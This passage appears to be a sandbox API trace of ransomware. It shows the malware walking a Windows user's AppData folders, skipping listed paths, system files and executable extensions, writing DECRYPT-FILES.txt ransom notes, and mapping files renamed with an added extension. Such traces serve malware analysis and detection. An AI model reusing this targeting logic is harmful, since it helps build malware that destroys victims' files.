ftCreationTime.dwLowDateTime=0x28cff640, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0xabda3140, ftLastAccessTime.dwHighDateTime=0x1d5981b, ftLastWriteTime.dwLowDateTime=0xabda3140, ftLastWriteTime.dwHighDateTime=0x1d5981b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="PrivacIE", cAlternateFileName="")) returned 1 [0182.166] lstrcmpW (lpString1="PrivacIE", lpString2=".") returned 1 [0182.166] lstrcmpW (lpString1="PrivacIE", lpString2="..") returned 1 [0182.167] lstrcatW (in: lpString1="PrivacIE", lpString2="\\" | out: lpString1="PrivacIE\\") returned="PrivacIE\\" [0182.167] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\", lpString2="PrivacIE\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\PrivacIE\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\PrivacIE\\" [0182.167] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\PrivacIE\\", lpSrch="\\Program Files") returned 0x0 [0182.167] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\PrivacIE\\", lpSrch=":\\Windows") returned 0x0 [0182.167] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\PrivacIE\\", lpSrch="\\Games\\") returned 0x0 [0182.167] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\PrivacIE\\", lpSrch="\\Tor Browser\\") returned 0x0 [0182.167] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\PrivacIE\\", lpSrch="\\ProgramData\\") returned 0x0 [0182.167] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\PrivacIE\\", lpSrch="\\cache2\\entries\\") returned 0x0 [0182.167] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\PrivacIE\\", lpSrch="\\Low\\Content.IE5\\") returned 0x0 [0182.167] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\PrivacIE\\", lpSrch="\\User Data\\Default\\Cache\\") returned 0x0 [0182.167] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\PrivacIE\\", lpSrch="\\All Users") returned 0x0 [0182.167] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\PrivacIE\\", lpSrch="\\IETldCache\\") returned 0x0 [0182.167] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\PrivacIE\\", lpSrch="\\Local Settings\\") returned 0x0 [0182.167] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\PrivacIE\\", lpSrch="\\AppData\\Local") returned 0x0 [0182.167] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\PrivacIE\\", lpSrch="AhnLab") returned 0x0 [0182.167] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\PrivacIE\\", lpSrch="{0AFACED1-E828-11D1-9187-B532F1E9575D}") returned 0x0 [0182.167] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\PrivacIE\\") returned 73 [0182.167] lstrlenW (lpString="0a16c9.tmp") returned 10 [0182.167] wsprintfW (in: param_1=0x36fe2f8, param_2="%s\\%s" | out: param_1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\PrivacIE\\\\0a16c9.tmp") returned 84 [0182.167] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\PrivacIE\\\\0a16c9.tmp" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\windows\\privacie\\0a16c9.tmp"), dwDesiredAccess=0x0, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x4000000, hTemplateFile=0x0) returned 0x274 [0182.168] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\PrivacIE\\") returned 73 [0182.168] lstrlenW (lpString="DECRYPT-FILES.txt") returned 17 [0182.168] wsprintfW (in: param_1=0x36fe2f8, param_2="%s\\%s" | out: param_1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\PrivacIE\\\\DECRYPT-FILES.txt") returned 91 [0182.168] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\PrivacIE\\\\DECRYPT-FILES.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\windows\\privacie\\decrypt-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0182.169] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\PrivacIE\\") returned 73 [0182.169] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\PrivacIE\\", lpString2="*" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\PrivacIE\\*") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\PrivacIE\\*" [0182.169] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\PrivacIE\\*", lpFindFileData=0x36feb18 | out: lpFindFileData=0x36feb18*(dwFileAttributes=0x2016, ftCreationTime.dwLowDateTime=0x28cff640, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0xef995500, ftLastAccessTime.dwHighDateTime=0x1d5981b, ftLastWriteTime.dwLowDateTime=0xef995500, ftLastWriteTime.dwHighDateTime=0x1d5981b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x479978 [0182.169] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0182.169] FindNextFileW (in: hFindFile=0x479978, lpFindFileData=0x36feb18 | out: lpFindFileData=0x36feb18*(dwFileAttributes=0x2016, ftCreationTime.dwLowDateTime=0x28cff640, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0xef995500, ftLastAccessTime.dwHighDateTime=0x1d5981b, ftLastWriteTime.dwLowDateTime=0xef995500, ftLastWriteTime.dwHighDateTime=0x1d5981b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0182.169] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0182.169] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0182.170] FindNextFileW (in: hFindFile=0x479978, lpFindFileData=0x36feb18 | out: lpFindFileData=0x36feb18*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xef995500, ftCreationTime.dwHighDateTime=0x1d5981b, ftLastAccessTime.dwLowDateTime=0xef995500, ftLastAccessTime.dwHighDateTime=0x1d5981b, ftLastWriteTime.dwLowDateTime=0xef995500, ftLastWriteTime.dwHighDateTime=0x1d5981b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="0a16c9.tmp", cAlternateFileName="")) returned 1 [0182.170] lstrcmpiW (lpString1="0a16c9.tmp", lpString2="DECRYPT-FILES.txt") returned -1 [0182.170] lstrcmpiW (lpString1="0a16c9.tmp", lpString2="autorun.inf") returned -1 [0182.170] lstrcmpiW (lpString1="0a16c9.tmp", lpString2="boot.ini") returned -1 [0182.170] lstrcmpiW (lpString1="0a16c9.tmp", lpString2="desktop.ini") returned -1 [0182.170] lstrcmpiW (lpString1="0a16c9.tmp", lpString2="ntuser.dat") returned -1 [0182.170] lstrcmpiW (lpString1="0a16c9.tmp", lpString2="iconcache.db") returned -1 [0182.170] lstrcmpiW (lpString1="0a16c9.tmp", lpString2="bootsect.bak") returned -1 [0182.170] lstrcmpiW (lpString1="0a16c9.tmp", lpString2="ntuser.dat.log") returned -1 [0182.170] lstrcmpiW (lpString1="0a16c9.tmp", lpString2="thumbs.db") returned -1 [0182.170] lstrcmpiW (lpString1="0a16c9.tmp", lpString2="Bootfont.bin") returned -1 [0182.170] lstrlenW (lpString="0a16c9.tmp") returned 10 [0182.170] lstrcmpiW (lpString1="tmp", lpString2="lnk") returned 1 [0182.170] lstrcmpiW (lpString1="tmp", lpString2="exe") returned 1 [0182.170] lstrcmpiW (lpString1="tmp", lpString2="sys") returned 1 [0182.170] lstrcmpiW (lpString1="tmp", lpString2="dll") returned 1 [0182.170] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\PrivacIE\\") returned 73 [0182.170] lstrlenW (lpString="0a16c9.tmp") returned 10 [0182.170] lstrcpyW (in: lpString1=0x36fe2e8, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\PrivacIE\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\PrivacIE\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\PrivacIE\\" [0182.170] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\PrivacIE\\", lpString2="0a16c9.tmp" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\PrivacIE\\0a16c9.tmp") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\PrivacIE\\0a16c9.tmp" [0182.170] VirtualAlloc (lpAddress=0x0, dwSize=0x28, flAllocationType=0x3000, flProtect=0x4) returned 0x750000 [0182.170] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\PrivacIE\\0a16c9.tmp" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\windows\\privacie\\0a16c9.tmp"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0182.171] CloseHandle (hObject=0x0) returned 0 [0182.171] VirtualFree (lpAddress=0x750000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0182.171] FindNextFileW (in: hFindFile=0x479978, lpFindFileData=0x36feb18 | out: lpFindFileData=0x36feb18*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xabd0abc0, ftCreationTime.dwHighDateTime=0x1d5981b, ftLastAccessTime.dwLowDateTime=0xabd0abc0, ftLastAccessTime.dwHighDateTime=0x1d5981b, ftLastWriteTime.dwLowDateTime=0xabd0abc0, ftLastWriteTime.dwHighDateTime=0x1d5981b, nFileSizeHigh=0x0, nFileSizeLow=0x23fc, dwReserved0=0x0, dwReserved1=0x0, cFileName="DECRYPT-FILES.txt", cAlternateFileName="DECRYP~1.TXT")) returned 1 [0182.171] lstrcmpiW (lpString1="DECRYPT-FILES.txt", lpString2="DECRYPT-FILES.txt") returned 0 [0182.171] FindNextFileW (in: hFindFile=0x479978, lpFindFileData=0x36feb18 | out: lpFindFileData=0x36feb18*(dwFileAttributes=0x2026, ftCreationTime.dwLowDateTime=0x94fde710, ftCreationTime.dwHighDateTime=0x1d2fab5, ftLastAccessTime.dwLowDateTime=0x94fde710, ftLastAccessTime.dwHighDateTime=0x1d2fab5, ftLastWriteTime.dwLowDateTime=0xabd7cfe0, ftLastWriteTime.dwHighDateTime=0x1d5981b, nFileSizeHigh=0x0, nFileSizeLow=0x8108, dwReserved0=0x0, dwReserved1=0x0, cFileName="index.dat.d19Plni", cAlternateFileName="INDEXD~1.D19")) returned 1 [0182.171] lstrcmpiW (lpString1="index.dat.d19Plni", lpString2="DECRYPT-FILES.txt") returned 1 [0182.171] lstrcmpiW (lpString1="index.dat.d19Plni", lpString2="autorun.inf") returned 1 [0182.171] lstrcmpiW (lpString1="index.dat.d19Plni", lpString2="boot.ini") returned 1 [0182.171] lstrcmpiW (lpString1="index.dat.d19Plni", lpString2="desktop.ini") returned 1 [0182.171] lstrcmpiW (lpString1="index.dat.d19Plni", lpString2="ntuser.dat") returned -1 [0182.171] lstrcmpiW (lpString1="index.dat.d19Plni", lpString2="iconcache.db") returned 1 [0182.171] lstrcmpiW (lpString1="index.dat.d19Plni", lpString2="bootsect.bak") returned 1 [0182.171] lstrcmpiW (lpString1="index.dat.d19Plni", lpString2="ntuser.dat.log") returned -1 [0182.171] lstrcmpiW (lpString1="index.dat.d19Plni", lpString2="thumbs.db") returned -1 [0182.171] lstrcmpiW (lpString1="index.dat.d19Plni", lpString2="Bootfont.bin") returned 1 [0182.171] lstrlenW (lpString="index.dat.d19Plni") returned 17 [0182.171] lstrcmpiW (lpString1="d19Plni", lpString2="lnk") returned -1 [0182.171] lstrcmpiW (lpString1="d19Plni", lpString2="exe") returned -1 [0182.171] lstrcmpiW (lpString1="d19Plni", lpString2="sys") returned -1 [0182.171] lstrcmpiW (lpString1="d19Plni", lpString2="dll") returned -1 [0182.171] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\PrivacIE\\") returned 73 [0182.171] lstrlenW (lpString="index.dat.d19Plni") returned 17 [0182.171] lstrcpyW (in: lpString1=0x36fe2e8, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\PrivacIE\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\PrivacIE\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\PrivacIE\\" [0182.171] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\PrivacIE\\", lpString2="index.dat.d19Plni" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\PrivacIE\\index.dat.d19Plni") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\PrivacIE\\index.dat.d19Plni" [0182.171] VirtualAlloc (lpAddress=0x0, dwSize=0x28, flAllocationType=0x3000, flProtect=0x4) returned 0x750000 [0182.172] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\PrivacIE\\index.dat.d19Plni" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\windows\\privacie\\index.dat.d19plni"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x27c [0182.172] GetFileSizeEx (in: hFile=0x27c, lpFileSize=0x36fdab0 | out: lpFileSize=0x36fdab0*=33032) returned 1 [0182.172] CreateFileMappingW (hFile=0x27c, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0x280 [0182.172] MapViewOfFile (hFileMappingObject=0x280, dwDesiredAccess=0x2, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x0) returned 0x8a0000 [0182.173] UnmapViewOfFile (lpBaseAddress=0x8a0000) returned 1 [0182.173] CloseHandle (hObject=0x280) returned 1 [0182.173] CloseHandle (hObject=0x27c) returned 1 [0182.173] VirtualFree (lpAddress=0x750000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0182.173] FindNextFileW (in: hFindFile=0x479978, lpFindFileData=0x36feb18 | out: lpFindFileData=0x36feb18*(dwFileAttributes=0x2012, ftCreationTime.dwLowDateTime=0x28cff640, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0xabe15560, ftLastAccessTime.dwHighDateTime=0x1d5981b, ftLastWriteTime.dwLowDateTime=0xabe15560, ftLastWriteTime.dwHighDateTime=0x1d5981b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Low", cAlternateFileName="")) returned 1 [0182.173] lstrcmpW (lpString1="Low", lpString2=".") returned 1 [0182.174] lstrcmpW (lpString1="Low", lpString2="..") returned 1 [0182.174] lstrcatW (in: lpString1="Low", lpString2="\\" | out: lpString1="Low\\") returned="Low\\" [0182.174] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\PrivacIE\\", lpString2="Low\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\PrivacIE\\Low\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\PrivacIE\\Low\\" [0182.174] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\PrivacIE\\Low\\", lpSrch="\\Program Files") returned 0x0 [0182.174] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\PrivacIE\\Low\\", lpSrch=":\\Windows") returned 0x0 [0182.174] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\PrivacIE\\Low\\", lpSrch="\\Games\\") returned 0x0 [0182.174] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\PrivacIE\\Low\\", lpSrch="\\Tor Browser\\") returned 0x0 [0182.174] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\PrivacIE\\Low\\", lpSrch="\\ProgramData\\") returned 0x0 [0182.174] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\PrivacIE\\Low\\", lpSrch="\\cache2\\entries\\") returned 0x0 [0182.174] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\PrivacIE\\Low\\", lpSrch="\\Low\\Content.IE5\\") returned 0x0 [0182.174] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\PrivacIE\\Low\\", lpSrch="\\User Data\\Default\\Cache\\") returned 0x0 [0182.174] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\PrivacIE\\Low\\", lpSrch="\\All Users") returned 0x0 [0182.174] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\PrivacIE\\Low\\", lpSrch="\\IETldCache\\") returned 0x0 [0182.174] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\PrivacIE\\Low\\", lpSrch="\\Local Settings\\") returned 0x0 [0182.174] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\PrivacIE\\Low\\", lpSrch="\\AppData\\Local") returned 0x0 [0182.174] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\PrivacIE\\Low\\", lpSrch="AhnLab") returned 0x0 [0182.174] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\PrivacIE\\Low\\", lpSrch="{0AFACED1-E828-11D1-9187-B532F1E9575D}") returned 0x0 [0182.174] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\PrivacIE\\Low\\") returned 77 [0182.174] lstrlenW (lpString="0a16c9.tmp") returned 10 [0182.174] wsprintfW (in: param_1=0x36fe07c, param_2="%s\\%s" | out: param_1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\PrivacIE\\Low\\\\0a16c9.tmp") returned 88 [0182.174] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\PrivacIE\\Low\\\\0a16c9.tmp" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\windows\\privacie\\low\\0a16c9.tmp"), dwDesiredAccess=0x0, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x4000000, hTemplateFile=0x0) returned 0x27c [0182.175] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\PrivacIE\\Low\\") returned 77 [0182.175] lstrlenW (lpString="DECRYPT-FILES.txt") returned 17 [0182.175] wsprintfW (in: param_1=0x36fe07c, param_2="%s\\%s" | out: param_1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\PrivacIE\\Low\\\\DECRYPT-FILES.txt") returned 95 [0182.175] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\PrivacIE\\Low\\\\DECRYPT-FILES.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\windows\\privacie\\low\\decrypt-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0182.175] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\PrivacIE\\Low\\") returned 77 [0182.175] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\PrivacIE\\Low\\", lpString2="*" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\PrivacIE\\Low\\*") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\PrivacIE\\Low\\*" [0182.175] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\PrivacIE\\Low\\*", lpFindFileData=0x36fe89c | out: lpFindFileData=0x36fe89c*(dwFileAttributes=0x2012, ftCreationTime.dwLowDateTime=0x28cff640, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0xef9bb660, ftLastAccessTime.dwHighDateTime=0x1d5981b, ftLastWriteTime.dwLowDateTime=0xef9bb660, ftLastWriteTime.dwHighDateTime=0x1d5981b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x4799b8 [0182.175] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0182.175] FindNextFileW (in: hFindFile=0x4799b8, lpFindFileData=0x36fe89c | out: lpFindFileData=0x36fe89c*(dwFileAttributes=0x2012, ftCreationTime.dwLowDateTime=0x28cff640, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0xef9bb660, ftLastAccessTime.dwHighDateTime=0x1d5981b, ftLastWriteTime.dwLowDateTime=0xef9bb660, ftLastWriteTime.dwHighDateTime=0x1d5981b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0182.175] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0182.175] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0182.175] FindNextFileW (in: hFindFile=0x4799b8, lpFindFileData=0x36fe89c | out: lpFindFileData=0x36fe89c*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xef9bb660, ftCreationTime.dwHighDateTime=0x1d5981b, ftLastAccessTime.dwLowDateTime=0xef9bb660, ftLastAccessTime.dwHighDateTime=0x1d5981b, ftLastWriteTime.dwLowDateTime=0xef9bb660, ftLastWriteTime.dwHighDateTime=0x1d5981b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="0a16c9.tmp", cAlternateFileName="")) returned 1 [0182.175] lstrcmpiW (lpString1="0a16c9.tmp", lpString2="DECRYPT-FILES.txt") returned -1 [0182.175] lstrcmpiW (lpString1="0a16c9.tmp", lpString2="autorun.inf") returned -1 [0182.175] lstrcmpiW (lpString1="0a16c9.tmp", lpString2="boot.ini") returned -1 [0182.175] lstrcmpiW (lpString1="0a16c9.tmp", lpString2="desktop.ini") returned -1 [0182.175] lstrcmpiW (lpString1="0a16c9.tmp", lpString2="ntuser.dat") returned -1 [0182.175] lstrcmpiW (lpString1="0a16c9.tmp", lpString2="iconcache.db") returned -1 [0182.175] lstrcmpiW (lpString1="0a16c9.tmp", lpString2="bootsect.bak") returned -1 [0182.176] lstrcmpiW (lpString1="0a16c9.tmp", lpString2="ntuser.dat.log") returned -1 [0182.176] lstrcmpiW (lpString1="0a16c9.tmp", lpString2="thumbs.db") returned -1 [0182.176] lstrcmpiW (lpString1="0a16c9.tmp", lpString2="Bootfont.bin") returned -1 [0182.176] lstrlenW (lpString="0a16c9.tmp") returned 10 [0182.176] lstrcmpiW (lpString1="tmp", lpString2="lnk") returned 1 [0182.176] lstrcmpiW (lpString1="tmp", lpString2="exe") returned 1 [0182.176] lstrcmpiW (lpString1="tmp", lpString2="sys") returned 1 [0182.176] lstrcmpiW (lpString1="tmp", lpString2="dll") returned 1 [0182.176] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\PrivacIE\\Low\\") returned 77 [0182.176] lstrlenW (lpString="0a16c9.tmp") returned 10 [0182.176] lstrcpyW (in: lpString1=0x36fe06c, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\PrivacIE\\Low\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\PrivacIE\\Low\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\PrivacIE\\Low\\" [0182.176] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\PrivacIE\\Low\\", lpString2="0a16c9.tmp" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\PrivacIE\\Low\\0a16c9.tmp") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\PrivacIE\\Low\\0a16c9.tmp" [0182.176] VirtualAlloc (lpAddress=0x0, dwSize=0x28, flAllocationType=0x3000, flProtect=0x4) returned 0x750000 [0182.176] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\PrivacIE\\Low\\0a16c9.tmp" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\windows\\privacie\\low\\0a16c9.tmp"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0182.176] CloseHandle (hObject=0x0) returned 0 [0182.176] VirtualFree (lpAddress=0x750000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0182.176] FindNextFileW (in: hFindFile=0x4799b8, 